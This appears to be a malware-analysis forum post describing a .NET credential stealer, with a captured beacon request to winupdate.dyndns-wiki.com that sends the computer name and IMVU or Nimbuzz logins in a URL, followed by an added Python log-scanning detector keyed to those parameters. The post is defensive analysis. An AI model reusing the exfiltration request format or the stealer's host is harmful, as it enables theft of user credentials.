A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #5567  by Xylitol
 Sun Mar 20, 2011 4:51 pm
Code:
Host: winupdate.dyndns-wiki.com
GET /api.php?key=ACAB&computer=XYLITOL-28E1A19&tool=IMVU&page=&user=&pass= HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Microsoft Visual C# / Basic .NET [Overlay]
dropped file in %temp%: "XYLITOL-28E1A19" (computer name)
Code:
Application: Nimbuzz
Username: 
Passwort: 

Application: IMVU
Username : 
Password :

Info seems to be sent via URL to avoid an FTP/SMTP connection, and the user/password are transmitted in the clear.
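
Added example, not part of the original post: a small Python detector that scans proxy log lines for GET requests carrying credentials in the query string, using the parameter names from the captured request above. The log line layout, the generic `CRED_PARAMS` list, and the function names are assumptions made for illustration; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the captured request in the post.
STEALER_PARAMS = {"key", "computer", "tool", "page", "user", "pass"}
# Generic names that suggest credentials travelling in a URL (assumption).
CRED_PARAMS = {"user", "username", "login", "pass", "password", "pwd"}

# Assumed proxy log layout: "<client_ip> <host> <METHOD> <path?query>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")

def classify(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, host, method, target = m.groups()
    parts = urlsplit(target)
    # keep_blank_values: the captured request sends user=&pass= with empty values
    params = parse_qs(parts.query, keep_blank_values=True)
    names = {n.lower() for n in params}
    if method != "GET" or not names & CRED_PARAMS:
        return None
    exact = STEALER_PARAMS <= names  # full parameter set seen in the post
    return {
        "client": client,
        "host": host,
        "path": parts.path,
        "match": "stealer-pattern" if exact else "credentials-in-url",
        "cred_params": sorted(names & CRED_PARAMS),
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines; only the second reproduces the posted request.
SAMPLE = [
    "10.0.0.5 example.org GET /index.html",
    "10.0.0.7 winupdate.dyndns-wiki.com GET /api.php?key=ACAB&computer=XYLITOL-28E1A19&tool=IMVU&page=&user=&pass=",
    "10.0.0.9 intranet.example GET /login?username=alice&password=hunter2",
    "10.0.0.9 intranet.example POST /login",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Matching on parameter names rather than on the hostname keeps the rule useful if the dynamic DNS name changes.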